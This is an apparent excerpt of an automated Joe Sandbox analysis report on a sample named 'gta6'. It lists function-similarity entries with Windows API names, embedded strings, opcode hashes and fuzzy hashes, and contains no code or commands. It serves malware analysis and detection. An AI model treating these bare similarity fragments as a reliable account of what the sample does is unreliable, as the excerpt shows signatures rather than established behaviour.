      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
      • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
      • API String ID: 217932011-4219398408
      • Opcode ID: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
      • Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
      • Opcode Fuzzy Hash: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
      • Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
      • API String ID: 1878685483-287042676
      • Opcode ID: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
      • Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
      • Opcode Fuzzy Hash: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
      • Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: _wcsdupfreewcsncpy$Value
      • String ID:
      • API String ID: 1554701960-0
      • Opcode ID: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
      • Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
      • Opcode Fuzzy Hash: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
      • Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
      • String ID:
      • API String ID: 684997728-0
      • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
      • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
      • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
      • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProcSleep
      • String ID: InitOnceExecuteOnce$Kernel32.dll
      • API String ID: 938261879-1339284965
      • Opcode ID: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
      • Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
      • Opcode Fuzzy Hash: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
      • Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Window$CurrentThread$EnableEnumWindows
      • String ID:
      • API String ID: 2527101397-0
      • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
      • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
      • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
      • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Value$AllocateHeap$Alloc
      • String ID:
      • API String ID: 2511646910-0
      • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
      • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
      • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
      • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
      • String ID:
      • API String ID: 2823868979-0
      • Opcode ID: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
      • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
      • Opcode Fuzzy Hash: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
      • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
      • String ID:
      • API String ID: 3171405041-0
      • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
      • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
      • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
      • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: memset$memcpy
      • String ID:
      • API String ID: 368790112-0
      • Opcode ID: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
      • Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
      • Opcode Fuzzy Hash: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
      • Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID:
      • String ID: $ $header crc mismatch
      • API String ID: 0-4092041874
      • Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
      • Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
      • Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
      • Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Heapwcsncpy$AllocateFree
      • String ID:
      • API String ID: 2817115924-0
      • Opcode ID: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
      • Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
      • Opcode Fuzzy Hash: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
      • Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AllocateCriticalHeapSection$EnterLeave
      • String ID:
      • API String ID: 3625150316-0
      • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
      • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
      • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
      • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: memcpy
      • String ID: $ $invalid stored block lengths
      • API String ID: 3510742995-1718185709
      • Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
      • Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
      • Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
      • Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: EntryFunctionLookup$UnwindVirtual
      • String ID:
      • API String ID: 3286588846-0
      • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
      • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
      • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
      • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AllocateHeapmemsetwcscpywcslen
      • String ID:
      • API String ID: 2037025450-0
      • Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
      • Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
      • Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
      • Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Heap$Free$Allocate
      • String ID:
      • API String ID: 3472947110-0
      • Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
      • Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
      • Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
      • Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CharLower
      • String ID:
      • API String ID: 1615517891-0
      • Opcode ID: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
      • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
      • Opcode Fuzzy Hash: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
      • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: ByteCharMultiWidemalloc
      • String ID:
      • API String ID: 2735977093-0
      • Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
      • Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
      • Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
      • Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AllocateCriticalHeapSection$EnterLeave
      • String ID:
      • API String ID: 3625150316-0
      • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
      • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
      • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
      • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: FolderFreeFromListLocationPathTaskwcslen
      • String ID:
      • API String ID: 4012708801-0
      • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
      • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
      • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
      • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CriticalFreeHeapSection$EnterLeave
      • String ID:
      • API String ID: 1298188129-0
      • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
      • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
      • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
      • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: ByteCharMultiWidemalloc
      • String ID:
      • API String ID: 2735977093-0
      • Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
      • Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
      • Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
      • Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: FreeHeap$CriticalSection$EnterLeavememset
      • String ID:
      • API String ID: 4254243056-0
      • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
      • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
      • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
      • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740